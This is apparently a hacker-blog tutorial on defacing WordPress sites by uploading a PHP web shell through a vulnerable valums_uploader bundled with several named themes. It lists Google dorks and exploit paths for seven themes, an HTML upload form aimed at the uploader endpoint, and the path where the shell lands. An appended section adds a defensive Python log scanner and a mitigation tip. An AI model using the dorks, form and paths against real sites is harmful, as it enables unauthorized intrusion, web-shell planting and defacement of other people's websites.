Deface Wordpress Valums uploader shell upload


This time I'm going to share a deface tutorial using the WordPress Valums Uploader Shell Upload exploit.

This exploit takes advantage of a bug in the valums uploader bundled with the themes.

1. Dork: inurl:/wp-content/themes/nuance/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

2. Dork: inurl:/wp-content/themes/lightspeed/
exploit: /framework/_scripts/valums_uploader/php.php

3. Dork: inurl:/wp-content/themes/saico/
exploit: /framework/_scripts/valums_uploader/php.php

4. Dork: inurl:/wp-content/themes/eptonic/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

5. Dork: inurl:/wp-content/themes/skinizer/
exploit: /framework/_scripts/valums_uploader/php.php

6. Dork: inurl:/wp-content/themes/area53/
exploit: /framework/_scripts/valums_uploader/php.php

7. Dork: inurl:/wp-content/themes/blinc/
exploit: /framework/_scripts/valums_uploader/php.php


The method: go straight to Google and search using the dorks above.

You can spot a vulnerable site like this.. it shows the text {"error":"No files were uploaded.",



Now build the CSRF form in Notepad and save it with an .html extension.



<form enctype="multipart/form-data" action="target.com/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

If you can't be bothered to make one, you can use this one: CLICK HERE. Set FileName to qqfile.

Any CSRF form will do.. here's an example of a site where the file uploaded successfully.




Access the shell at /wp-content/uploads/year/month/shellname.php
example: target.com/wp-content/uploads/2016/12/nueenggak.php
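From the defender's side, the chain above leaves two clear traces in a web server access log: requests to the theme-bundled valums_uploader/php.php endpoint, and a follow-up request for a .php file under wp-content/uploads/ where the post says the upload lands. The scanner below is an added example, not part of the original post; the log lines, addresses and file names it contains are constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (Apache combined format). Hosts and paths are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Dec/2016:10:01:02 +0000] "GET /wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php HTTP/1.1" 200 38 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Dec/2016:10:01:09 +0000] "POST /wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php HTTP/1.1" 200 21 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Dec/2016:10:01:15 +0000] "GET /wp-content/uploads/2016/12/nueenggak.php HTTP/1.1" 200 4512 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Dec/2016:10:02:00 +0000] "GET /wp-content/uploads/2016/12/photo.jpg HTTP/1.1" 200 81234 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Dec/2016:10:02:03 +0000] "GET /index.php HTTP/1.1" 200 9801 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, method, request path and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The uploader endpoint, whatever theme directory it is shipped under.
UPLOADER_RE = re.compile(r'/wp-content/themes/[^/]+/.*/valums_uploader/php\.php$')
# PHP-executable files requested from the uploads tree, which should only hold media.
UPLOADS_PHP_RE = re.compile(r'/wp-content/uploads/.*\.(php\d?|phtml)$')


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious request, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group('path').split('?', 1)[0]  # ignore any query string
        if UPLOADER_RE.search(path):
            kind = 'uploader_post' if m.group('method') == 'POST' else 'uploader_probe'
        elif UPLOADS_PHP_RE.search(path):
            kind = 'php_in_uploads'
        else:
            continue
        findings.append({'ip': m.group('ip'), 'kind': kind, 'path': path, 'status': m.group('status')})
    return findings


def likely_webshell_sources(findings: List[Dict[str, str]]) -> List[str]:
    """IPs that POSTed to the uploader and then requested a .php file under uploads."""
    posted = {f['ip'] for f in findings if f['kind'] == 'uploader_post'}
    executed = {f['ip'] for f in findings if f['kind'] == 'php_in_uploads'}
    return sorted(posted & executed)


if __name__ == '__main__':
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h)
    print('likely webshell drops from:', likely_webshell_sources(hits))
```

Denying PHP execution under wp-content/uploads at the web server breaks the second half of the chain regardless of which theme ships the uploader; the log check above then still shows you who tried.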

@source: agan ganteng
